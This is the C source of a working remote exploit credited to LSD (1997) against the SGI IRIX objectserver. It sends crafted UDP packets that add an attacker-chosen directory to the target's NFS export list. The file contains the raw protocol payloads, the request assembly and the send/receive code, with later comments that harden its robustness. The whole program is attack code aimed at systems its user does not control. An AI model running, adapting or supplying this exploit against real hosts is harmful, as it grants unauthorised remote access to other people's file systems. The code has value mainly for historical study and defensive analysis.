
  1. /*## copyright LAST STAGE OF DELIRIUM jul 1997 poland        *://lsd-pl.net/ #*/
  2. /*## objectserver                                                            #*/
  3.  
  4. /*   SGI objectserver "export" exploit                                        */
  5. /*   Remotely adds new entry to the export list on the IRIX system.           */
  6. /*   See our SGI objectserver "account" exploit for more information.         */
  7. /*   Only directories that aren't supersets of already exported ones          */
  8. /*   can be added to the export list.                                         */
  9.  
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
  18. #define E if(errno) perror("");
  19.  
/* Scatter/gather descriptors shared by every send and receive:
 * iov[0] carries the 16-byte message header, iov[1] the body. */
struct iovec iov[2];

/* msghdr handed to sendmsg()/recvmsg(); (re)filled by the request functions. */
struct msghdr msg;

/* Receive buffers: the header lands in buf1, the body in buf2
 * (receives ask for at most 0x200 body bytes). */
char buf1[1024];
char buf2[1024];

/* UDP socket towards the target. */
int sck;

/* Target IPv4 address as returned by inet_addr(), i.e. network byte order. */
unsigned long adr;
  25.  
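/* Dump len bytes of data as a hex/ASCII table, 16 bytes per row.  The first
 * row is prefixed with the length as four hex digits; continuation rows are
 * indented to line up with it.  data is unsigned so isprint() never sees a
 * negative value (undefined behaviour with a signed char). */
static void hexdump(const unsigned char *data, size_t len)
{
    size_t off;

    printf("%04x   ", (unsigned)(len & 0xffff));
    if (len == 0) {
        printf("\n");
        return;
    }
    for (off = 0; off < len; off += 16) {
        size_t row = (len - off < 16) ? len - off : 16;
        size_t i;

        if (off != 0)
            printf("       ");
        for (i = 0; i < row; i++)
            printf("%02x ", data[off + i]);
        /* pad a short final row so the ASCII column stays aligned */
        for (i = row; i < 16; i++)
            printf("   ");
        printf("    ");
        for (i = 0; i < row; i++)
            putchar(isprint(data[off + i]) ? data[off + i] : '.');
        printf("\n");
    }
}

/* Trace helper: print the message currently described by the global
 * iov[]/msg pair.  iov[0] (the header) is always dumped; when a body is
 * attached (msg_iovlen == 2) the body is dumped for as many bytes as the
 * header's big-endian length field at bytes 10-11 announces.
 *
 * Fixes versus the original: header bytes are read as unsigned (a byte
 * >= 0x80 used to make the length negative), the body length is clamped to
 * iov[1].iov_len so a peer-supplied length cannot walk past the buffer, and
 * a final row of exactly one byte is no longer dropped from the ASCII
 * column. */
void show_msg(void){
    const unsigned char *hdr=iov[0].iov_base;
    size_t body_len;

    hexdump(hdr,iov[0].iov_len);
    if(msg.msg_iovlen!=2) return;

    /* the length field lives at offsets 10-11; need at least 12 header bytes */
    if(iov[0].iov_len<0x0c){
        printf("(header too short for a body length)\n");
        fflush(stdout);
        return;
    }
    body_len=((size_t)hdr[0x0a]<<8)|hdr[0x0b];
    /* On received messages this value comes from the peer: never trust it
     * beyond what iov[1] can hold. */
    if(body_len>iov[1].iov_len) body_len=iov[1].iov_len;
    hexdump(iov[1].iov_base,body_len);
    fflush(stdout);
}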
  94.  
/*
 * Raw protocol messages.  Every request is sent as two iovecs: a 16-byte
 * header (*_one) whose bytes 10-11 hold the big-endian body length, and the
 * body (*_two).  The byte values are reproduced from the original exploit;
 * only the positions that the rest of this file reads or patches are
 * annotated, the meaning of the other bytes is not known from this file.
 */

/* Header of the "query system info" request; body length 0x0024 = sizeof numer_two. */
char numer_one[0x10]={
    0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
    0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
};

/* Body of the "query system info" request, sent verbatim. */
char numer_two[0x24]={
    0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
    0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
    0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
    0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
    0x01,0x07,0x01,0x01
};

/* Header of the "add export" request.  Bytes 10-11 (0x012a here) are only a
 * placeholder: main() overwrites them with the assembled body length. */
char dodaj_one[0x10]={
    0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
    0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
};

/* Body of the "add export" request.  Only the first 12 bytes are fixed
 * (bytes 6-11 are the same 6-byte marker get_sysinfo() searches for in the
 * reply).  main() appends, in order: the length-prefixed remote system ID,
 * dodaj_three, a length byte plus the directory name, and dodaj_four.
 * Sized 1024 so the assembled body fits; the assembling code must keep the
 * total within this bound. */
char dodaj_two[1024]={
    0x1c,0x03,0x00,0x43,0x01,0x04,0x0a,0x01,
    0x01,0x3b,0x01,0x78
};

/* Fixed bytes placed between the system ID and the directory name. */
char dodaj_three[27]={
    0x01,0x02,0x0a,0x01,0x01,0x3b,0x01,
    0xd2,0x00,0x00,0x80,0x43,0x01,0x04,0x17,
    0x0b,0x01,0x01,0x3b,0x01,0x02,0x01,0x01,
    0x01,0x09,0x43,0x01
};

/* Trailer placed after the directory name.  Contains the ASCII string
 * "root" (0x72 0x6f 0x6f 0x74); the final four 0xff bytes are replaced by
 * main() with the target's IPv4 address. */
char dodaj_four[47]={
    0x17,0x0b,0x01,0x01,0x3b,0x01,0xd2,
    0x01,0x04,0x01,0x09,0x43,0x01,0x04,0x72,
    0x6f,0x6f,0x74,0x17,0x0b,0x01,0x01,0x3b,
    0x01,0xd2,0x01,0x08,0x01,0x07,0x01,0x01,
    0x17,0x0b,0x01,0x01,0x3b,0x01,0x01,0x01,
    0x01,0x01,0x0f,0x02,0xff,0xff,0xff,0xff
};

/* Destination address as a raw sockaddr_in: family 2 (AF_INET) in the
 * first two bytes, port 0x140f (5135) in network order, then the IPv4
 * address, which main() copies in at offset 4.
 * NOTE(review): the family field is laid out for a big-endian host (IRIX);
 * on a little-endian host it would have to read 0x02,0x00.  Also, because
 * this buffer is used as msg_name for recvmsg() too, it is overwritten with
 * the sender's address of every received datagram. */
char fake_adrs[0x10]={
    0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
  138.  
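/* Send the "query system info" request (numer_one/numer_two) to the target
 * and locate the remote system ID in the reply.
 *
 * Returns a pointer into buf2 at the ID's length byte (the ID bytes follow
 * it), or NULL when the send or receive fails, the reply is too short, the
 * marker is not found, or the peer-supplied ID length would run past the
 * bytes actually received.  The pointer is valid only until buf2 is
 * refilled by the next receive.
 *
 * Side effect: recvmsg() stores the sender's address in msg_name, which
 * points at fake_adrs, so later sends go to whoever answered. */
char *get_sysinfo(){
    ssize_t got;
    size_t payload,i;

    iov[0].iov_base=numer_one;
    iov[0].iov_len=0x10;
    iov[1].iov_base=numer_two;
    iov[1].iov_len=0x24;
    /* Zeroing the whole msghdr clears the ancillary-data fields without
     * naming them (msg_accrights on 4.3BSD/IRIX, msg_control elsewhere). */
    memset(&msg,0,sizeof msg);
    msg.msg_name=fake_adrs;
    msg.msg_namelen=0x10;
    msg.msg_iov=iov;
    msg.msg_iovlen=2;
    got=sendmsg(sck,&msg,0);
    if(got<0){
        perror("sendmsg");
        return(0);
    }
    printf("SM:  --[0x%04x bytes]--\n",(unsigned)got); show_msg();
    printf("\n");

    /* Same header/body split for the reply: 16 bytes into buf1, the rest
     * (at most 0x200) into buf2.  A dump of stale buffers is avoided by
     * bailing out before show_msg() when the receive fails. */
    iov[0].iov_base=buf1;
    iov[1].iov_base=buf2;
    iov[1].iov_len=0x200;
    msg.msg_iovlen=2;
    got=recvmsg(sck,&msg,0);
    if(got<0){
        perror("recvmsg");
        return(0);
    }
    printf("RM:  --[0x%04x bytes]--\n",(unsigned)got); show_msg();
    printf("\n");

    /* Number of body bytes that really arrived in buf2. */
    if((size_t)got<=iov[0].iov_len) return(0);
    payload=(size_t)got-iov[0].iov_len;
    if(payload>iov[1].iov_len) payload=iov[1].iov_len;

    /* Scan for the 6-byte marker; the byte following it is the ID length. */
    for(i=0;i+6<payload;i++){
        size_t idlen,j;

        if(memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)!=0) continue;
        idlen=(unsigned char)buf2[i+6];
        /* The length byte is chosen by the peer: refuse an ID that does not
         * fit inside the received data instead of reading past it. */
        if(i+7+idlen>payload){
            printf("error: system ID length %lu exceeds reply.\n",(unsigned long)idlen);
            return(0);
        }
        printf("remote system ID: ");
        for(j=0;j<idlen;j++) printf("%02x ",(unsigned char)buf2[i+7+j]);
        printf("\n");
        return(&buf2[i+6]);
    }
    return(0);
}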
  170.  
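/* Send the assembled "add export" request (dodaj_one header + the first
 * len bytes of dodaj_two) to the target and dump the reply.
 *
 * len must be 0..sizeof dodaj_two; anything else is refused so a bad
 * length computed by the caller can never make sendmsg() read past the
 * buffer.  Failures of sendmsg()/recvmsg() are reported with perror() and
 * end the function early (nothing is returned; the reply is only printed). */
void new_export(int len){
    ssize_t got;

    if(len<0||(size_t)len>sizeof(dodaj_two)){
        printf("error: export request length %d does not fit the buffer.\n",len);
        return;
    }

    iov[0].iov_base=dodaj_one;
    iov[0].iov_len=0x10;
    iov[1].iov_base=dodaj_two;
    iov[1].iov_len=(size_t)len;
    /* Zeroing the whole msghdr clears the ancillary-data fields without
     * naming them (msg_accrights on 4.3BSD/IRIX, msg_control elsewhere). */
    memset(&msg,0,sizeof msg);
    msg.msg_name=fake_adrs;
    msg.msg_namelen=0x10;
    msg.msg_iov=iov;
    msg.msg_iovlen=2;
    got=sendmsg(sck,&msg,0);
    if(got<0){
        perror("sendmsg");
        return;
    }
    printf("SM:  --[0x%04x bytes]--\n",(unsigned)got); show_msg();
    printf("\n");

    /* Reply: 16 header bytes into buf1, at most 0x200 body bytes into buf2. */
    iov[0].iov_base=buf1;
    iov[1].iov_base=buf2;
    iov[1].iov_len=0x200;
    msg.msg_iovlen=2;
    got=recvmsg(sck,&msg,0);
    if(got<0){
        perror("recvmsg");
        return;
    }
    printf("RM:  --[0x%04x bytes]--\n",(unsigned)got); show_msg();
    printf("\n");
}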
  192.  
/* Print the usage line; text is the program name (argv[0]). */
void info(char *text) {
    fprintf(stdout, "usage: %s address directory\n", text);
}
  196.  
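/* Entry point.  usage: <prog> address [directory]
 *
 * With only an address the tool queries and prints the remote system ID
 * ("probe" mode).  With a directory it then assembles the "add export"
 * request into dodaj_two and sends it.
 *
 * Exit status: 1 when a failure is detected here (malformed address, no
 * socket, no usable reply, oversized request), otherwise 0 as before.
 *
 * Fixes versus the original: inet_addr() and socket() results are checked
 * (an unparsable address used to become 255.255.255.255 and broadcast the
 * requests), a receive timeout is set so a silent host does not hang the
 * tool, the directory length is bounded by its one-byte length prefix and
 * by sizeof dodaj_two (previously an over-long argv[2] overflowed the
 * buffer), and the system ID length byte is treated as unsigned. */
int main(int argc,char **argv){
    int probe=0;
    unsigned int offset;
    char *sys_info;
    size_t idlen,dirlen,total;
    struct in_addr target;
    struct timeval tv;

    printf("copyright LAST STAGE OF DELIRIUM jul 1997 poland  //lsd-pl.net/\n");
    printf("objectserver for irix 5.2 5.3 6.2\n\n");

    if(argc<2) {info(argv[0]);exit(0);}
    else if(argc==2) probe=1;

    adr=inet_addr(argv[1]);
    if(adr==INADDR_NONE){
        printf("error: invalid address %s.\n",argv[1]);
        exit(1);
    }
    /* adr is an unsigned long; go through a 4-byte in_addr so the memcpy()s
     * below pick the address bytes on LP64 hosts too. */
    target.s_addr=adr;

    sck=socket(AF_INET,SOCK_DGRAM,0);
    if(sck<0){
        perror("socket");
        exit(1);
    }
#ifdef SO_RCVTIMEO
    /* Without a timeout recvmsg() blocks forever against a filtered or
     * dead host.  A platform that refuses the option only loses the timeout. */
    tv.tv_sec=5;
    tv.tv_usec=0;
    if(setsockopt(sck,SOL_SOCKET,SO_RCVTIMEO,&tv,sizeof tv)<0)
        perror("setsockopt(SO_RCVTIMEO)");
#endif
    memcpy(&fake_adrs[4],&target,4);
    memcpy(&dodaj_four[43],&target,4);

    if(!(sys_info=get_sysinfo())){
        printf("error: can't get system ID for %s.\n",argv[1]);
        exit(1);
    }
    /* recvmsg() stores the sender's address in msg_name, which points at
     * fake_adrs, so the export request goes to whoever answered.  Say so
     * when that is not the host we asked. */
    if(memcmp(&fake_adrs[4],&target,4)!=0)
        printf("warning: reply did not come from %s; the export request will be sent to the responder.\n",argv[1]);

    if(probe){
        printf("error: no directory specified.\n");
        return 0;
    }

    /* Every length below comes from outside (the peer's ID byte, argv);
     * validate before writing into dodaj_two. */
    idlen=(unsigned char)sys_info[0];
    dirlen=strlen(argv[2]);
    if(dirlen>0xff){
        printf("error: directory name longer than 255 bytes.\n");
        exit(1);
    }
    total=0x0c+idlen+1+sizeof(dodaj_three)+1+dirlen+sizeof(dodaj_four);
    if(total>sizeof(dodaj_two)){
        printf("error: request would be %lu bytes, buffer is %lu.\n",
               (unsigned long)total,(unsigned long)sizeof(dodaj_two));
        exit(1);
    }

    /* Body layout: 12 fixed bytes | length-prefixed system ID | dodaj_three |
     * length byte | directory | dodaj_four. */
    offset=0x0c;
    memcpy(&dodaj_two[offset],sys_info,idlen+1);
    offset+=idlen+1;
    memcpy(&dodaj_two[offset],dodaj_three,sizeof(dodaj_three));
    offset+=sizeof(dodaj_three);
    dodaj_two[offset++]=(char)dirlen;
    memcpy(&dodaj_two[offset],argv[2],dirlen);
    offset+=dirlen;
    memcpy(&dodaj_two[offset],dodaj_four,sizeof(dodaj_four));
    offset+=sizeof(dodaj_four);
    /* header bytes 10-11: body length, big-endian */
    dodaj_one[10]=(char)(offset>>8);
    dodaj_one[11]=(char)(offset&0xff);
    new_export((int)offset);
    return 0;
}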
  234.  
  235.